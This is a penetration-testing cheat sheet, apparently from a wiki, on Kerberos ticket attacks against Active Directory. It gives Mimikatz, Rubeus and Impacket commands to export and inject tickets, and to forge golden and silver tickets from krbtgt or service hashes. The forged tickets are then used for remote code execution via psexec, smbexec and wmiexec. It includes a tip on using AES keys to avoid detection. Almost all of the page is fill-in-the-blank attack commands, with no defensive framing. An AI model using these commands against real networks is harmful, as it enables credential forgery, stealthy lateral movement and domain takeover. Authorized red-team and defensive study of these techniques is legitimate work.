Tickets

Pass-The-Ticket

Mimikatz

https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos

sekurlsa::tickets /export
kerberos::list /export
kerberos::ptt <path/to/ticket.kirbi>
kerberos::golden /domain:<domain> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user> [/id:<user_rid>] /ticket:<ticket.kirbi> /ptt

Purge

kerberos::purge

Convert tickets

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Rubeus

Rubeus.exe ptt </ticket:BASE64 | /ticket:ticket.kirbi>

Purge

Rubeus.exe purge

Convert tickets

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Golden ticket

Impacket

tip

Use AES keys to stay stealth.

Request TGS

python ticketer.py -nthash <krbtgt_ntlm> -domain-sid <domain_sid> -domain <domain>  <user>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain> <user>

Set TGT for impacket

export KRB5CCNAME=<TGS_ccache_file>

RCE via ticket

python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass

Mimikatz

kerberos::golden /domain:<domain>/sid:<domain_sid> /rc4:<krbtgt_ntlm> /user:<user> /target:<host> /ptt
kerberos::golden /domain:<domain>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user> /target:<host> /ptt
kerberos::golden /domain:<domain>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user> /service:<service> /target:<host> /ptt

Rubeus

Rubeus.exe ptt </ticket:BASE64 | /ticket:ticket.kirbi>

Silver ticket

Impacket

tip

Use AES keys to stay stealth.

Request TGS

python ticketer.py -nthash <ntlm> -domain-sid <domain_sid> -domain <domain> -spn <service_spn>  <user>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain> -spn <service_spn>  <user>

Set TGT for impacket

export KRB5CCNAME=<TGS_ccache_file>

RCE via ticket

python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass

Mimikatz

kerberos::golden /domain:<domain>/sid:<domain_sid> /rc4:<ntlm> /user:<user> /service:<service> /target:<host> /ptt
kerberos::golden /domain:<domain>/sid:<domain_sid> /aes128:<aes128_key> /user:<user> /service:<service> /target:<host> /ptt
kerberos::golden /domain:<domain>/sid:<domain_sid> /aes256:<aes256_key> /user:<user> /service:<service> /target:<host> /ptt

Rubeus

Rubeus.exe ptt </ticket:BASE64 | /ticket:ticket.kirbi>

Pass-The-Ticket​

Mimikatz​

Rubeus​

Convert tickets​

Golden ticket​

Impacket​

Mimikatz​

Rubeus​

Silver ticket​

Impacket​

Mimikatz​

Rubeus​

Pass-The-Ticket

Mimikatz

Rubeus

Convert tickets

Golden ticket

Impacket

Mimikatz

Rubeus

Silver ticket

Impacket

Mimikatz

Rubeus